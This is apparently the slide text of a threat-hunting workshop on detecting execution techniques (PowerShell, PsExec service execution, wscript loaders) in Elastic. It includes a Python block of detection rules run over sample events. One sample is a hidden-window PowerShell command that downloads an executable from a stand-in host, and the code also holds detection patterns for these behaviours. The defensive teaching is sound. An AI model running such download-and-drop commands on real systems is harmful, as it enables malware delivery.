Welcome to Class!
While You're waiting...
Don't Forget To:
☐ Download the Milestone Document in the Handouts Section
☐ Perform a new ingestion of the data to Elastic (See config guide)
☐ Login to HUNTER to make sure you have access
Note: if you haven't created your HUNTER account, go to www.Cyborgsecurity.com and hit the "SIGN UP" button in the upper right, using promo code 'EXECUTION'
The Threat Hunting Workshop:
hunting for execution!
Hunting for behaviors of execution in an environment
WWW.CYBORGSECURITY.COM
05 OCT 2022
Let's go over a few things:
• Configuration
• Questions
• Webinar Recording
• Final challenge
Introductions
• 10+ years IT
• 5 years SOC
• 3 years Threat Hunting
https://www.linkedin.com/in/lee-archinal/
Lee Archinal @ArchinalLee
(Instructor)
Introduction to EXECUTION
What is EXECUTION?
• Execution consists of techniques that result in adversary-controlled code running on a local or remote system.
• There are many different ways to accomplish the goal, and you can find more here:
  • https://attack.mitre.org/tactics/TA0002/ [1]
• Techniques discussed today:
  • T1059 – Command And Scripting Interpreter
    • https://attack.mitre.org/techniques/T1059/ [2]
  • T1569.002 – System Services: Service Execution
    • https://attack.mitre.org/techniques/T1569/002/ [3]
  • T1204.002 – User Execution: Malicious File
    • https://attack.mitre.org/techniques/T1204/002/ [4]
Resource List
• We will be using the Elastic SIEM (Security Information and Event Management)
  • Collects logs from different log sources and provides a central location that is searchable.
• We will be using multiple query languages
  • Kibana Query Language (KQL), e.g. Process.id:4444
  • Lucene, e.g. a case-insensitive regex wildcard for "evil.exe": '/.*[Ee][Vv][Ii][Ll]\.[Ee][Xx][Ee].*/'
  • Domain specific language: these are the hunts that we are going to extract from HUNTER.
• Milestone document
  • This contains some artifacts that we will find along the way as well as your challenges.
QUICK NOTE
• We will be using the logs-* index to run our hunt. If you are not seeing any logs, check that you have the correct index selected.
• We will be searching based off of a 24 hour window. If you have not ingested the logs recently, you may have to expand the time window to cover when you ingested the data in order to find the logs.
HUNT PACKAGES
• Malicious PowerShell Process - Connect To Internet With Hidden Window
• Metasploit / Impacket PsExec Process Creation Activity
• WScript Executing File From Zip - Potential Loader Execution
T1059 - COMMAND AND SCRIPTING INTERPRETER
Background
• Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. [2]
• These include, but are not limited to:
  • PowerShell
  • Windows Command Shell
  • Unix Shell
Opportunities TO HUNT FOR
• EventType: Process Create
  • Windows Event ID 4688
  • Sysmon Event ID 1
• PowerShell Script Block Logging
Malicious PowerShell Process - Connect To Internet With Hidden Window
• Focus of the Hunt:
  • Process Being Created: PowerShell
  • CommandLine contains:
    • Arguments or flags that suggest a hidden shell is being created: any combination of "-windowstyle" and "hidden"
    • Arguments that suggest it is reaching out to the internet to fetch a file: looking for "Net.WebClient" and "New-Object"
T1569.002 - METASPLOIT / IMPACKET PSEXEC PROCESS CREATION ACTIVITY
Background
• Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services. [3] Services that are created can be found in registry keys.
• PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers alike.
  • https://attack.mitre.org/software/S0029/ [5]
Opportunities TO HUNT FOR
• EventType: Process Create
  • Windows Event ID 4688
  • Sysmon Event ID 1
• PowerShell Script Block Logging
Hunt package used
• Metasploit / Impacket PsExec Process Creation Activity
  • Focuses on a naming convention that has been tested and determined to be a constant action that happens when either tool's PsExec module is used.
  • Looking for:
    • ParentProcess=*services.exe
    • ProcessName=C:\Windows\[8 alpha-character name consisting of either lowercase, uppercase, or a combination of the two].exe
    • An event that correlates with a process create type.
T1204.002 - WSCRIPT EXECUTING FILE FROM ZIP - POTENTIAL LOADER EXECUTION
Background
• An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. [4]
• Similar to the normal phishing campaigns that involve a document and a macro, malicious files may be saved in an archive for the user or the threat actor to extract or execute.
Opportunities for detection
• EventType: Process Create
  • Windows Event ID 4688
  • Sysmon Event ID 1
• PowerShell Script Block Logging
WScript Executing File From Zip - Potential Loader
• Focus of the Hunt:
  • Process Create Event Type
  • ProcessName=*wscript.exe
  • ProcessCommandLine contains ONE OF (7z, zip, RAR)
  • ProcessCommandLine=*\temp\*
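The three hunt packages above reduce to simple conditions over process-create fields. The block below is an added example, not code from the workshop or from HUNTER: it implements all three checks in Python over a constructed handful of ECS-style process events (field names process.name, process.parent.name, process.executable and process.command_line are assumed), with one hit and one benign event per hunt. The hidden-window check also accepts the abbreviated -w hidden form that powershell.exe allows, which goes slightly beyond the slide's wording.

```python
import re

# Constructed sample process-create events with Elastic ECS-style field names
# (not taken from the workshop's dataset): one hit and one benign event per hunt.
EVENTS = [
    {"process.name": "powershell.exe", "process.parent.name": "winword.exe",
     "process.command_line": "powershell.exe -WindowStyle Hidden -c \"(New-Object Net.WebClient)"
                             ".DownloadFile('http://example.invalid/a.exe','C:\\Users\\Public\\a.exe')\""},
    {"process.name": "powershell.exe", "process.parent.name": "explorer.exe",
     "process.command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"process.name": "TzQhwKla.exe", "process.parent.name": "services.exe",
     "process.executable": "C:\\Windows\\TzQhwKla.exe", "process.command_line": "C:\\Windows\\TzQhwKla.exe"},
    {"process.name": "svchost.exe", "process.parent.name": "services.exe",
     "process.executable": "C:\\Windows\\System32\\svchost.exe", "process.command_line": "svchost.exe -k netsvcs"},
    {"process.name": "wscript.exe", "process.parent.name": "explorer.exe",
     "process.command_line": "wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\7zO1234\\invoice.js"},
    {"process.name": "wscript.exe", "process.parent.name": "explorer.exe",
     "process.command_line": "wscript.exe C:\\tools\\cleanup.vbs"},
]

# "-WindowStyle Hidden", including the abbreviated "-w hidden" form powershell.exe accepts
WINDOWSTYLE_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# C:\Windows\<exactly 8 letters>.exe: the service binary name the PsExec hunt package keys on
PSEXEC_SVC = re.compile(r"^c:\\windows\\[a-z]{8}\.exe$", re.IGNORECASE)
ARCHIVE_HINT = re.compile(r"7z|zip|rar", re.IGNORECASE)

def hidden_powershell_download(ev):
    """T1059: PowerShell started with a hidden window that also fetches with Net.WebClient."""
    cl = ev.get("process.command_line", "").lower()
    return (ev.get("process.name", "").lower() == "powershell.exe"
            and WINDOWSTYLE_HIDDEN.search(cl) is not None
            and "new-object" in cl and "net.webclient" in cl)

def psexec_service_binary(ev):
    """T1569.002: services.exe spawning C:\\Windows\\<8 alpha chars>.exe (Metasploit/Impacket PsExec)."""
    return (ev.get("process.parent.name", "").lower() == "services.exe"
            and PSEXEC_SVC.match(ev.get("process.executable", "")) is not None)

def wscript_from_archive_temp(ev):
    """T1204.002: wscript.exe running a script that an archive tool extracted under \\temp\\."""
    cl = ev.get("process.command_line", "").lower()
    return (ev.get("process.name", "").lower() == "wscript.exe"
            and ARCHIVE_HINT.search(cl) is not None and "\\temp\\" in cl)

HUNTS = {f.__name__: f for f in (hidden_powershell_download, psexec_service_binary, wscript_from_archive_temp)}

def run_hunts(events):
    """Return (hunt name, event index) for every event that trips a hunt, in event order."""
    return [(name, i) for i, ev in enumerate(events) for name, check in HUNTS.items() if check(ev)]
```

Running run_hunts(EVENTS) flags events 0, 2 and 4 only; the legitimate svchost.exe child of services.exe is not matched because its path includes System32.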
TO THE HUNT!
The Final Challenge
Earn Your Threat Hunting Credentials!
• In your threat hunting platform there is one more example of execution.
• Use what you have learned today to find the method and answer the challenge questions using data from the log file.
• There are no time limits.
• https://info.cyborgsecurity.com/execution
Q&A
HUNTER
The threat hunting content platform
Get access for FREE with promo code: execution
https://www.huntwithcyb.org/hunter
Cyborg Security has launched a podcast with a twist! Join us for a terrifyingly fun evening on October
27th from 7:00 – 8:30 pm ET for Episode 3 of Out of the Woods: The Threat Hunting Podcast!
This Halloween season, join a rag-tag bunch of threat hunters around the campfire as they come out of
the haunted woods to talk about the bone-chilling topics that affect threat hunters, security researchers,
and threat intelligence professionals.
Follow us: @CyborgSecInc | cyborg-security | Cyborg Security